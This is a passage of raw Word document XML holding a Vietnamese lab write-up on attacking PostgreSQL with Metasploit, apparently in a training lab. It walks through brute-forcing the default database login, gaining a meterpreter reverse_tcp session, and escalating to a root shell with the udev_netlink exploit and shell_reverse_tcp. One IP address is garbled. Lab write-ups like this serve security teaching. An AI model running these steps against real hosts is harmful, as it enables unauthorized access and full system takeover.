          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>203.129</w:t>
      </w:r>
      <w:r w:rsidR="007279E3" w:rsidRPr="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FC0F6C" wp14:editId="031CC328">
            <wp:extent cx="5295900" cy="252625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2703" cy="2529498"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C967E"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xml:space="preserve">5.3 Khai thác lỗi đăng nhập trên PostgreSQL, cổng 5432: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68064AC5"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Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F5017"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Khai báo sử dụng mô đun tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D606B1B"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msf &gt; use auxiliary/scanner/postgres/postgres_login </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F9C21B"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Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36982A60" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E88715" wp14:editId="3792E215">
            <wp:extent cx="5943600" cy="404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45585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E70EE" w14:textId="41E4FF5D"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Đặt địa chỉ IP máy victim: msf &gt; set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="00192499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F1BF4"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Đặt địa tham số dừng: msf&gt; set STOP_ON_SUCCESS true </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C009AC" w14:textId="4C8BBD7E" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00192499" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F17A7E" wp14:editId="057B257F">
            <wp:extent cx="6120765" cy="10229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022985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="704007DD"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A9734"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">- Thực thi tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710791B6"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msf &gt; run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6DDB91" w14:textId="3B467B54" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00192499" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19F60E33" wp14:editId="0BE0DD92">
            <wp:extent cx="6120765" cy="15005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500505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D2B9B" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sau một số lần thử, máy victim sẽ thông báo kết nối thành công đến CSDL trong PostgreSQL sử dụng tài khoản với mật khẩu ngầm định. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CEC2A9"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Gõ lệnh exit để kết thúc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0E8FDB"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5.4 Khai thác lỗi trên PostgreSQL cho phép mở shell chạy với quyền root: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1A2D2"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Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC01918"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Khai báo sử dụng mô đun postgres_payload để tạo 1 phiên kết nối đến CSDL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FA083"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msf &gt; use exploit/linux/postgres/postgres_payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D7F8E"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Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E34CBF" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B7552A8" wp14:editId="7EF0AEC7">
            <wp:extent cx="5943600" cy="3475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5990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203ECEA"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Chọn payload cho thực thi: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA4A952"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msf &gt; set payload linux/x86/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700803C" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="726DF5E9" wp14:editId="7F7FE1F4">
            <wp:extent cx="5943600" cy="556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6260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="194468A6"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Đặt địa chỉ IP máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F5C87" w14:textId="7E776EBE" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msf &gt; set RHOST 192.1688.</w:t>
      </w:r>
      <w:r w:rsidR="00192499">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D9808"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Đặt địa chỉ IP máy tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE67D1" w14:textId="1917B3F6"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msf &gt; set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="006446EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE1689C"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Đặt mật khẩu cho CSDL: msf &gt; set PASSWORD postgres </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876FE8B" w14:textId="0E780F0B" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00202C3B" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE5E2A7" wp14:editId="4434E959">
            <wp:extent cx="5925377" cy="115268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377" cy="1152686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FD41E"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Thực thi tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02495087"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msf &gt; exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A30569" w14:textId="2E81FD4B" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00202C3B" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BDEF4EC" wp14:editId="0C8EE0AF">
            <wp:extent cx="6120765" cy="15379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537970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CD1B38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76137A17" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➔</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tạo được 1 phiên kết nối đến CSDL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FB93E"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Chuyển phiên kết nối sang chế độ chạy ngầm sử dụng lệnh “background”: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB26725"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meterpreter &gt; background </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062BFEAA" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73AD50D1" wp14:editId="5B026653">
            <wp:extent cx="3886742" cy="6858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742" cy="685896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D57BEC"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Đặt mô đun khai thác để mở shell: msf &gt; use exploit/linux/local/udev_netlink </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79000777"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Chọn payload cho thực thi: msf &gt; set payload linux/x86/shell_reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B4E4E"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Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567B35E" w14:textId="5E44CD8D" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00202C3B" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="108E9509" wp14:editId="63C5AA1E">
            <wp:extent cx="6120765"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962400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3658FD5B"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Kết nối đến phiên CSDL đang chạy ngầm: msf &gt; set SESSION 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC6E98"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Thực thi tấn công: msf &gt; exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B6B3B"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Chạy các lệnh để đọc tên người dùng và máy victim khai thác thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD57C6"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 xml:space="preserve"> whoami </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD409E" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>uname –a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04A047" w14:textId="08D8C251" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00202C3B" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EA361C2" wp14:editId="333A0034">
            <wp:extent cx="6120765" cy="28105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810510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="34040002" w14:textId="3088ECFF" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidSect="007E464E">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1418"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1D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="338617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22788"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94DC3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067A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="838AAD36"/>
    <w:lvl w:ilvl="0" w:tplc="04090015">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A1C0C1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A1482"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0270E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B560D99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7D6FE2C"/>
    <w:lvl w:ilvl="0" w:tplc="D2AEE56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45F3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11424D3A"/>
    <w:lvl w:ilvl="0" w:tplc="9AFAF26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FF75BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DDC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F2374"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8CA07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72499"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="942E15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72A40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9144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46831"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7F8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D3670"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CA6928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E3953"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9112E7F6"/>
    <w:lvl w:ilvl="0" w:tplc="A88CB5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0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="7"/>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72"/>
    <w:rsid w:val="000454C3"/>
    <w:rsid w:val="000C7624"/>
    <w:rsid w:val="00192499"/>
    <w:rsid w:val="001A53A2"/>
    <w:rsid w:val="00202C3B"/>
    <w:rsid w:val="00244366"/>
    <w:rsid w:val="00273399"/>
    <w:rsid w:val="0028013F"/>
    <w:rsid w:val="002D6CBB"/>
    <w:rsid w:val="003851FD"/>
    <w:rsid w:val="00386046"/>
    <w:rsid w:val="003A5B6E"/>
    <w:rsid w:val="004B4812"/>
    <w:rsid w:val="00570DD6"/>
    <w:rsid w:val="005B6909"/>
    <w:rsid w:val="006446EA"/>
    <w:rsid w:val="006A2BA3"/>
    <w:rsid w:val="00701FED"/>
    <w:rsid w:val="00711414"/>
    <w:rsid w:val="007279E3"/>
    <w:rsid w:val="00782E4D"/>
    <w:rsid w:val="007E464E"/>
    <w:rsid w:val="00860FDB"/>
    <w:rsid w:val="008D37EC"/>
    <w:rsid w:val="009A25B9"/>
    <w:rsid w:val="009F7259"/>
    <w:rsid w:val="00A31F60"/>
    <w:rsid w:val="00AA2D9E"/>
    <w:rsid w:val="00AA3DCE"/>
    <w:rsid w:val="00AE7F5A"/>
    <w:rsid w:val="00B50DBB"/>
    <w:rsid w:val="00B527BA"/>
    <w:rsid w:val="00BB117E"/>
    <w:rsid w:val="00BB3496"/>
    <w:rsid w:val="00CC16C2"/>
    <w:rsid w:val="00CD1B38"/>
    <w:rsid w:val="00CE7A69"/>
    <w:rsid w:val="00D54FCA"/>
    <w:rsid w:val="00E3470D"/>
    <w:rsid w:val="00E7586C"/>
    <w:rsid w:val="00E75DA3"/>
    <w:rsid w:val="00E97E2D"/>
    <w:rsid w:val="00EA15C6"/>
    <w:rsid w:val="00EC4395"/>
    <w:rsid w:val="00F13849"/>
    <w:rsid w:val="00FC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3945"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{21BD1D20-4D30-4FB9-933A-93E524E5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4E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB3496"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB3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CB7B-6E60-4B55-B095-5E2D3C6A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Nguyễn Quang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hà Nguyễn Quang</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-02T18:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-02T22:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>